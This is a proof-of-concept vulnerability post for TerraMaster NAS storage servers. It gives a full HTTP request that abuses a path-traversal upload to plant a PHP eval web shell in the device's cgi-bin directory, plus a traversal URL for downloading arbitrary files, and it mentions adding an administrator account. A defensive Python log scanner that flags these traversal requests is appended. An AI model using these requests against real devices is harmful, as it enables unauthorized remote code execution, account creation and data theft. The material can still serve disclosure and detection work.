TerraMaster NAS network storage server: unrestricted getshell and other vulnerabilities (PoC)
Unrestricted getshell, adding arbitrary administrators, arbitrary file download, and multiple information leaks.
    POST /include/upload.php?TargetDir=../cgi-bin/filemanage/ HTTP/1.1
    Accept: text/*
    Content-Type: multipart/form-data; boundary=----------ei4KM7ae0KM7GI3ei4cH2ei4KM7GI3
    User-Agent: Shockwave Flash
    Host: Address
    Content-Length: 722
    Proxy-Connection: Keep-Alive
    Pragma: no-cache
    Cookie: PHPSESSID=

    ------------ei4KM7ae0KM7GI3ei4cH2ei4KM7GI3
    Content-Disposition: form-data; name="Filename"

    1.php
    ------------ei4KM7ae0KM7GI3ei4cH2ei4KM7GI3
    Content-Disposition: form-data; name="name"

    1.php
    ------------ei4KM7ae0KM7GI3ei4cH2ei4KM7GI3
    Content-Disposition: form-data; name="chunk"

    0
    ------------ei4KM7ae0KM7GI3ei4cH2ei4KM7GI3
    Content-Disposition: form-data; name="chunks"

    1
    ------------ei4KM7ae0KM7GI3ei4cH2ei4KM7GI3
    Content-Disposition: form-data; name="file"; filename="1.php"
    Content-Type: application/octet-stream

    <?php @eval($_POST['kako']);?>
    ------------ei4KM7ae0KM7GI3ei4cH2ei4KM7GI3
    Content-Disposition: form-data; name="Upload"

    Submit Query
    ------------ei4KM7ae0KM7GI3ei4cH2ei4KM7GI3--
Add an account whose username is aaaaaa and whose password is aaaaaa
Download any file (note that the downloaded php source code is encrypted)
http://address/cgi-bin/filemanage/download.php?File=../include/upload.php
Multiple information leaks are shown in the figure.
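
A defender-side check for the upload and download requests shown above, added here as an example and not part of the original PoC: it scans web access logs for requests to those two endpoints whose directory or file parameter contains a ".." path segment. The combined log format, the sample lines and all function names are assumptions; parameter names are matched case-insensitively.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Endpoint -> parameter, from the two requests on this page (names lower-cased).
WATCHED = {
    "/include/upload.php": "targetdir",
    "/cgi-bin/filemanage/download.php": "file",
}
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding before the value is inspected."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def has_traversal(value):
    """True if any path segment is '..' once backslashes are normalised."""
    return ".." in fully_decode(value).replace("\\", "/").split("/")

def scan(lines):
    """Return (line_number, path, parameter, decoded_value) for each hit."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group("target"))
        path = fully_decode(url.path)
        wanted = WATCHED.get(path.lower())
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key.lower() == wanted and has_traversal(value):
                hits.append((number, path, key, fully_decode(value)))
    return hits

# Constructed sample access-log lines (combined log format, documentation IPs).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "POST /include/upload.php?TargetDir=../cgi-bin/filemanage/ HTTP/1.1" 200 12',
    '192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /cgi-bin/filemanage/download.php?File=%2e%2e/include/upload.php HTTP/1.1" 200 900',
    '192.0.2.20 - - [01/Jan/2024:10:01:00 +0000] "GET /cgi-bin/filemanage/download.php?File=photos/a..b.jpg HTTP/1.1" 200 5000',
    '192.0.2.20 - - [01/Jan/2024:10:02:00 +0000] "GET /index.php?File=../x HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit on upload.php is worth following up by listing files under the targeted directory that are not part of the vendor firmware.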